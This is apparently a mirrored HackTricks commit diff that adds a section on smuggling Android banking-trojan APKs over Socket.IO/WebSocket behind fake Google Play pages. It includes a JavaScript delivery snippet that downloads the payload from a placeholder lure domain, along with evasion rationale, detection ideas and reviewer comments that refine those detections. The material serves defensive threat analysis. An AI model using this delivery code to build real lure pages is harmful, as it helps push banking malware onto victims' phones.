mirror of https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
	Merge pull request #1434 from HackTricks-wiki/update_Banker_Trojan_Targeting_Indonesian_and_Vietnamese__20250925_124652
Banker Trojan Targeting Indonesian and Vietnamese Android Us...
commit b5877a948f
				| @ -222,6 +222,49 @@ public void onMessageReceived(RemoteMessage msg){ | ||||
| 
 | ||||
| --- | ||||
| 
 | ||||
| ## Socket.IO/WebSocket-based APK Smuggling + Fake Google Play Pages | ||||
| 
 | ||||
| Attackers increasingly replace static APK links with a Socket.IO/WebSocket channel embedded in Google Play–looking lures. This conceals the payload URL, bypasses URL/extension filters, and preserves a realistic install UX. | ||||
| 
 | ||||
| Typical client flow observed in the wild: | ||||
| 
 | ||||
| ```javascript | ||||
| // Open Socket.IO channel and request payload | ||||
| const socket = io("wss://<lure-domain>/ws", { transports: ["websocket"] }); | ||||
| socket.emit("startDownload", { app: "com.example.app" }); | ||||
| 
 | ||||
| // Accumulate binary chunks and drive fake Play progress UI | ||||
| const chunks = []; | ||||
| socket.on("chunk", (chunk) => chunks.push(chunk)); | ||||
| socket.on("downloadProgress", (p) => updateProgressBar(p)); | ||||
| 
 | ||||
| // Assemble APK client‑side and trigger browser save dialog | ||||
| socket.on("downloadComplete", () => { | ||||
|   const blob = new Blob(chunks, { type: "application/vnd.android.package-archive" }); | ||||
|   const url = URL.createObjectURL(blob); | ||||
|   const a = document.createElement("a"); | ||||
|   a.href = url; a.download = "app.apk"; a.style.display = "none"; | ||||
|   document.body.appendChild(a); a.click(); | ||||
| }); | ||||
| ``` | ||||
| 
 | ||||
| Why it evades simple controls: | ||||
| - No static APK URL is exposed; payload is reconstructed in memory from WebSocket frames. | ||||
| - URL/MIME/extension filters that block direct .apk responses may miss binary data tunneled via WebSockets/Socket.IO. | ||||
| - Crawlers and URL sandboxes that don’t execute WebSockets won’t retrieve the payload. | ||||
| 
 | ||||
| Hunting and detection ideas: | ||||
| - Web/network telemetry: flag WebSocket sessions that transfer large binary chunks followed by creation of a Blob with MIME application/vnd.android.package-archive and a programmatic `<a download>` click. Look for client strings like socket.emit('startDownload'), and events named chunk, downloadProgress, downloadComplete in page scripts. | ||||
| - Play-store spoof heuristics: on non-Google domains serving Play-like pages, hunt for Google Play UI strings such as http.html:"VfPpkd-jY41G-V67aGc", mixed-language templates, and fake “verification/progress” flows driven by WS events. | ||||
| - Controls: block APK delivery from non-Google origins; enforce MIME/extension policies that include WebSocket traffic; preserve browser safe-download prompts. | ||||
| 
 | ||||
| See also WebSocket tradecraft and tooling: | ||||
| 
 | ||||
| {{#ref}} | ||||
| ../../pentesting-web/websocket-attacks.md | ||||
| {{#endref}} | ||||
| 
 | ||||
| 
 | ||||
| ## Android Accessibility/Overlay & Device Admin Abuse, ATS automation, and NFC relay orchestration – RatOn case study | ||||
| 
 | ||||
| The RatOn banker/RAT campaign (ThreatFabric) is a concrete example of how modern mobile phishing operations blend WebView droppers, Accessibility-driven UI automation, overlays/ransom, Device Admin coercion, Automated Transfer System (ATS), crypto wallet takeover, and even NFC-relay orchestration. This section abstracts the reusable techniques. | ||||
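Review bot: the "Hunting and detection ideas" bullet in this hunk misses the network artifact that the snippet itself produces. With socket.io-client, the path in `io("wss://<lure-domain>/ws", { transports: ["websocket"] })` is parsed as the Socket.IO namespace, not the endpoint; the transport still handshakes at the default Engine.IO path, i.e. `wss://<lure-domain>/socket.io/?EIO=4&transport=websocket` for current clients (or whatever a custom `path` option sets). That handshake URL is visible in proxy and DNS/TLS-SNI plus URL telemetry without script inspection, whereas the event names `startDownload`, `chunk`, `downloadProgress` and `downloadComplete` are only observable after TLS termination or in page scripts; add the `/socket.io/?EIO=` pattern to the telemetry bullet and keep the event names as a page-script heuristic. Related, the controls bullet's "enforce MIME/extension policies that include WebSocket traffic" contradicts the second "Why it evades" bullet: WebSocket binary frames carry no MIME type and the `application/vnd.android.package-archive` type is assigned client-side when the Blob is built, so reword it to something a proxy can actually do (flag or block binary WebSocket frames above a size threshold to unsanctioned domains, and rely on the browser/endpoint download scan that fires when `a.click()` saves the file). Finally, the flow ends at the browser save dialog; installing the APK still requires the victim to open it and grant the install-unknown-apps permission, so these lures must coach that step too, which is worth stating both for the "realistic install UX" claim and as another Play-spoof page heuristic.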
| @ -394,5 +437,8 @@ Background: [NFSkate NFC relay](https://www.threatfabric.com/blogs/ghost-tap-new | ||||
| - [Firebase Cloud Messaging — Docs](https://firebase.google.com/docs/cloud-messaging) | ||||
| - [The Rise of RatOn: From NFC heists to remote control and ATS (ThreatFabric)](https://www.threatfabric.com/blogs/the-rise-of-raton-from-nfc-heists-to-remote-control-and-ats) | ||||
| - [GhostTap/NFSkate – NFC relay cash-out tactic (ThreatFabric)](https://www.threatfabric.com/blogs/ghost-tap-new-cash-out-tactic-with-nfc-relay) | ||||
| - [Banker Trojan Targeting Indonesian and Vietnamese Android Users (DomainTools)](https://dti.domaintools.com/banker-trojan-targeting-indonesian-and-vietnamese-android-users/) | ||||
| - [DomainTools SecuritySnacks – ID/VN Banker Trojans (IOCs)](https://github.com/DomainTools/SecuritySnacks/blob/main/2025/BankerTrojan-ID-VN) | ||||
| - [Socket.IO](https://socket.io) | ||||
| 
 | ||||
| {{#include ../../banners/hacktricks-training.md}} | ||||
| {{#include ../../banners/hacktricks-training.md}} | ||||
|  | ||||
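Review bot: the banner include `{{#include ../../banners/hacktricks-training.md}}` appears twice in a row at the end of the file in this hunk; drop the second copy so the page does not render the banner twice. Minor: the new `[Socket.IO](https://socket.io)` entry is a bare homepage link while the other references name the specific document; since the section relies on binary event payloads and the namespace/path behaviour of the client, pointing it at the client API documentation would make the reference useful rather than decorative.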